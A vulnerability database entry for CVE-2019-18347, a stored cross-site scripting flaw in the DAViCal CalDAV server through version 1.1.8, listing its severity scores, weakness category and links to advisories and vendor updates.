Vulnerability Details : CVE-2019-18347
A stored XSS issue was discovered in DAViCal through 1.1.8. It does not adequately sanitize output of various fields that can be set by unprivileged users, making it possible for JavaScript stored in those fields to be executed by another (possibly privileged) user. Affected database fields include Username, Display Name, and Email.
Vulnerability category: Cross site scripting (XSS)
Products affected by CVE-2019-18347
- cpe:2.3:a:davical:davical:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2019-18347
0.16%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 52 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2019-18347
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
3.5
|
LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N |
6.8
|
2.9
|
NIST | |
5.4
|
MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
2.3
|
2.7
|
NIST |
CWE ids for CVE-2019-18347
-
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.Assigned by: nvd@nist.gov (Primary)
References for CVE-2019-18347
-
https://gitlab.com/davical-project/davical/blob/master/ChangeLog
ChangeLog · master · DAViCal Project / DAViCal · GitLabRelease Notes;Third Party Advisory
-
https://seclists.org/bugtraq/2019/Dec/30
Bugtraq: [SECURITY] [DSA 4582-1] davical security update
-
https://www.debian.org/security/2019/dsa-4582
Debian -- Security Information -- DSA-4582-1 davical
-
https://www.davical.org/
DAViCal - DAViCal HomeProduct
-
http://packetstormsecurity.com/files/155628/DAViCal-CalDAV-Server-1.1.8-Persistent-Cross-Site-Scripting.html
DAViCal CalDAV Server 1.1.8 Persistent Cross Site Scripting ≈ Packet StormThird Party Advisory
-
http://seclists.org/fulldisclosure/2019/Dec/17
Full Disclosure: CVE-2019-18347 Persistent Cross-Site Scripting (XSS) vulnerability in DAViCal CalDAV ServerThird Party Advisory
-
https://hackdefense.com/publications/cve-2019-18347-davical-caldav-server-vulnerability/
CVE-2019-18347 Persistent Cross-Site Scripting (XSS) vulnerability in DAViCal CalDAV Server – HackDefenseExploit;Third Party Advisory
-
https://lists.debian.org/debian-lts-announce/2019/12/msg00016.html
[SECURITY] [DLA 2034-1] davical security update
-
http://seclists.org/fulldisclosure/2019/Dec/18
Full Disclosure: CVE-2019-18346 Cross-Site Request Forgery (CSRF) vulnerability in DAViCal CalDAV ServerThird Party Advisory
-
http://seclists.org/fulldisclosure/2019/Dec/19
Full Disclosure: CVE-2019-18345 Reflected Cross-Site Scripting (XSS) vulnerability in DAViCal CalDAV ServerThird Party Advisory
Jump to